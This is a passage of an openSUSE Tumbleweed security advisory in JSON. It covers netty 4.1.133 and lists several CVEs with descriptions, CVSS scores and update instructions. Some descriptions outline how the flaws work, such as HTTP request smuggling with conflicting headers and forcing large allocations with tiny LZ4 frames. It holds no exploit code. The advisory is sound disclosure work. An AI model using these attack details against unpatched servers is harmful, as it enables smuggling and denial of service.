"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-41417"
},
{
"cve": "CVE-2026-42578",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42578"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s HttpProxyHandler constructs HTTP CONNECT requests with header validation explicitly disabled. The newInitialMessage() method creates headers using DefaultHttpHeadersFactory.headersFactory().withValidation(false), then adds user-provided outboundHeaders without any CRLF validation. This allows an attacker who can influence the outbound headers to inject arbitrary HTTP headers into the CONNECT request sent to the proxy server. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42578",
"url": "https://www.suse.com/security/cve/CVE-2026-42578"
},
{
"category": "external",
"summary": "SUSE Bug 1265243 for CVE-2026-42578",
"url": "https://bugzilla.suse.com/1265243"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42578"
},
{
"cve": "CVE-2026-42579",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42579"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s DNS codec does not enforce RFC 1035 domain name constraints during either encoding or decoding. This creates a bidirectional attack surface: malicious DNS responses can exploit the decoder, and user-influenced hostnames can exploit the encoder. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42579",
"url": "https://www.suse.com/security/cve/CVE-2026-42579"
},
{
"category": "external",
"summary": "SUSE Bug 1265272 for CVE-2026-42579",
"url": "https://bugzilla.suse.com/1265272"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42579"
},
{
"cve": "CVE-2026-42580",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42580"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty\u0027s chunk size parser silently overflows int, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42580",
"url": "https://www.suse.com/security/cve/CVE-2026-42580"
},
{
"category": "external",
"summary": "SUSE Bug 1265273 for CVE-2026-42580",
"url": "https://bugzilla.suse.com/1265273"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42580"
},
{
"cve": "CVE-2026-42581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42581"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpObjectDecoder strips a conflicting Content-Length header when a request carries both Transfer-Encoding: chunked and Content-Length, but only for HTTP/1.1 messages. The guard is absent for HTTP/1.0. An attacker that sends an HTTP/1.0 request with both headers causes Netty to decode the body as chunked while leaving Content-Length intact in the forwarded HttpMessage. Any downstream proxy or handler that trusts Content-Length over Transfer-Encoding will disagree on message boundaries, enabling request smuggling. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42581",
"url": "https://www.suse.com/security/cve/CVE-2026-42581"
},
{
"category": "external",
"summary": "SUSE Bug 1265277 for CVE-2026-42581",
"url": "https://bugzilla.suse.com/1265277"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.3,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42581"
},
{
"cve": "CVE-2026-42582",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42582"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final, when decoding header blocks, the non-Huffman branch of io.netty.handler.codec.http3.QpackDecoder#decodeHuffmanEncodedLiteral may execute new byte[length] for a string literal before verifying that length bytes are actually present in the compressed field section. The wire encoding allows a very large length to be expressed in few bytes. There is no check that length \u003c= in.readableBytes() before new byte[length]. This vulnerability is fixed in 4.2.13.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42582",
"url": "https://www.suse.com/security/cve/CVE-2026-42582"
},
{
"category": "external",
"summary": "SUSE Bug 1265318 for CVE-2026-42582",
"url": "https://bugzilla.suse.com/1265318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42582"
},
{
"cve": "CVE-2026-42583",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42583"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Lz4FrameDecoder allocates a ByteBuf of size decompressedLength (up to 32 MB per block) before LZ4 runs. A peer only needs a 21-byte header plus compressedLength payload bytes - 22 bytes if compressedLength == 1 - to force that allocation. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42583",
"url": "https://www.suse.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "SUSE Bug 1265279 for CVE-2026-42583",
"url": "https://bugzilla.suse.com/1265279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
